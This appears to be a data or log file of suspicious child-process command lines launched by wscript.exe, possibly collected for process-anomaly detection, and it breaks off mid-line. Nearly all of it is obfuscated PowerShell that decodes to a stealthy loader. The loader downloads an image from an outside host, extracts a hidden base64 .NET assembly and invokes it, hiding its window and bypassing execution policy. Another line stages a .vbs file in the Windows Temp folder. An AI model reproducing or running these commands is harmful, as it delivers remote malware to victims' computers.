çceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process	wscript.exe	martian_process	powershell.exe -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\.vbs)) { Copy-Item -Path .vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
parent_process	wscript.exe	martian_process	powershell -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGt